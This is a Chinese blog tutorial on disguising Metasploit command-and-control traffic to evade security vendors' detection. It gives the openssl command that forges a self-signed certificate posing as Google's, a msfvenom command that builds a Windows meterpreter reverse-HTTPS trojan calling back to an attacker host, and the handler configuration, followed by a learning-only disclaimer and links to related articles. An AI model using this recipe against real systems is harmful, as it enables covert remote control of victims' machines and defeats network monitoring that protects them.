msf流量通讯特征修改

最新推荐文章于 2024-05-04 13:45:08 发布
最新推荐文章于 2024-05-04 13:45:08 发布
阅读量4.4k 收藏 2
点赞数
分类专栏: cs&msf学习 文章标签: 安全 https http web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52839196/article/details/122810834
版权

众所周知msf在安全界的地位,那么它的特征安全厂商肯定是抓的死死的,所以我们需要相应的修改一下。

使用openssl生成证书。

对于openssl这个软件,kali自带。

输入如下命令;

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=US/ST=London/L=London/O=Google Trust Services LLC/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
CN=(名字与姓氏), OU=(组织单位名称), O=(组织名称), L=(城市或区域名称), ST=(州或省份名称), C=(单位的两字母国家代码

参数详解;

-new 指生成证书请求

-nodes 表示私钥不加密,若不带参数将提示输入密码;

-x509表示输出证书;

-days365 为有效期;

-x509 表示直接输出证书;

-subj选项执行自动输入;

 

以上便生成了一个伪谷歌证书了,让msf用上该证书。

首先生成配置该证书的木马文件。

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.1.131 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o p.exe

 将该木马上传到虚拟机上抓包

进入msfconsole,进行如下配置:

use exploit/multi/handler

set payload windows/meterpreter/reverse_winhttps

set lhost 0.0.0.0

set lport 443

set HandlerSSLCert www.google.com.pem

set StagerVerifySSLCert true

run

 执行并抓包:

 经过加密的数据包,并且自定义证书。

声明:本文所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!!!

suansuan-star
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF流量加密躲避检测
m0_50526465的博客
05-04 557
MSF流量加密躲避检测 对于OpenSSL不了解的,可以去看下我上一篇文章 使用Openssl加密 生成证书 这里C=UK;ST=London等可以对应下面的HTTPS证书看就明白是怎么回事了 openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \ -subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com" \ -keyout www.baidu.com.key \ -out w
应急响应-MSF流量分析&模式模块&特征提取
siu~
04-13 1057
战后-流量分析-MSF
MSF&CobaltStrik流量隐藏
qq_45434762的博客
12-05 1294
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
msf后门流量分析
2301_76227305的博客
04-15 1529
以上就是msf后门流量特征啦最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
热门推荐
黄乔国PHP
03-22 1万+
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
红队隧道加密之MSF流量加密(二)
xf555er的博客
11-26 2027
如今大多数企业的内网都部署了流量审计服务, 用来专门分析流量特征, 比如后门特征和行为特征若直接使用Metasploit对内网进行横向渗透, 其产生的流量会很容易被内网防护工具检测出来, 因此需对流量进行加密来绕过检测这里介绍使用OpenSSL对MSF流量进行加密。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
linux系统安装msf的过程详解
09-14
在Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
kali 渗透msf
11-14
kali渗透测试利器
MSF(Metasploit Framework)的介绍
最新发布
lei967809的博客
05-04 433
Metasploit Framework(简称MSF)是一款开源的渗测试工具,它提供了一套功能强大的工具和资源,用于评估和测试计算机系统的安全性。
MSF介绍
weixin_34005042的博客
04-21 191
MSF是一套大型系统开发指南,它描述了如何用组队模型、过程模型和应用模型来开发Client/Server结构的应用程序,是在微软的工具和技术的基础上建立并开发分布式企业系统应用的参考。 MSF的最大特性是商业化,并自始至终地体现在项目的实施过程中。所谓商业化意味着客户的商业利益。客户投入多少,得到多少回报,客户要用到哪些最新的技术,最后如何把...
msf之木马程序
ZZ100861122的博客
11-10 584
目录 捆绑木马 生成木马文件 附:msfvenom介绍 msfvenom简介 msfvenom生成 exploit/multi/handler模块简介 设置监听反弹 发送木马 查看对方的ip 查看对方目录 截图 开启摄像头 附:Meterpreter常用命令 进一步获取权限 伪装 捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 在这里插入图片描述 把它
网络安全进阶篇之流量加密(十三章-2)MSF流量加密躲避检测
划水的小白白
05-19 3238
文章目录一、为什么要加密二、创建证书三、上线MSF四、抓取流量测试五、不上线的情况5.1、经过测试win7系统无法上线。5.2、看看配置是否正确 一、为什么要加密 为了防止主机被入侵,现在大部分的内网环境都装有流量审计工具, 专门用来分析审查流量特征,分析网络流量,如后门特征、行为特征, 像 metasploit 在内网做横行渗透时,这些流量很容易就能被检测出来, 所以做好流量加密,就能避免审计工具检测出来。 大概过程: 使用openssl生成加密正常, msf生成木马的时候将证书加进去, 设置
应急响应——IDS&IPS&msf流量&后门分析
m0_61506558的博客
03-29 861
可以通过top命令查看恶意的流量信息,可以观察到test的流量非常可疑,有一定渗透经验的话可以判断出xmrig文件是常见的挖矿文件,我们也可以将文件放在微步在线、360威胁情报平台、venuseye、安恒威胁情报中心、360威胁情报中心、绿盟威胁情报中心、AlienVault。查看windows下的定时任务列表,找到可疑文件,接下来我们就要找到这个定时任务是怎么添加上去的,即找到漏洞入口在哪里。假如说我们开放了3389远程登入端口,就可以查看计算机管理下的安全日志,会留下攻击者爆破信息。
护网面试总结
zhihuijiazeng的博客
06-08 4641
从大佬的经验摘过来的
流量特征分析——蚁剑、菜刀、冰蝎
Sgirll的博客
07-22 5871
通过对这三种常见的网络攻击工具流量特征的分析,我们可以更好地了解它们在网络流量中的表现。网络管理员和安全专家可以根据这些特征来识别和监测潜在的攻击活动,并及时采取相应的防护措施。同时,持续的学习和了解新兴攻击工具的流量特征也是保持网络安全的重要一环。本文将重点研究菜刀、蚁剑和冰蝎这三种常见的网络攻击工具,分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。蚁剑(AntSword)是一款功能强大的跨平台渗透测试工具,被广泛用于攻击和渗透测试活动。
微软MSF框架:项目管理与实践经验
"微软MSF框架是微软在项目管理领域的一种成熟方法论,它源于微软自身项目的经验总结,旨在将技术、人和过程相结合,提高项目成功率。MSF框架经历了多个版本的演进,从最初的21条规则到后来的敏捷和CMMI等理念的融合...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值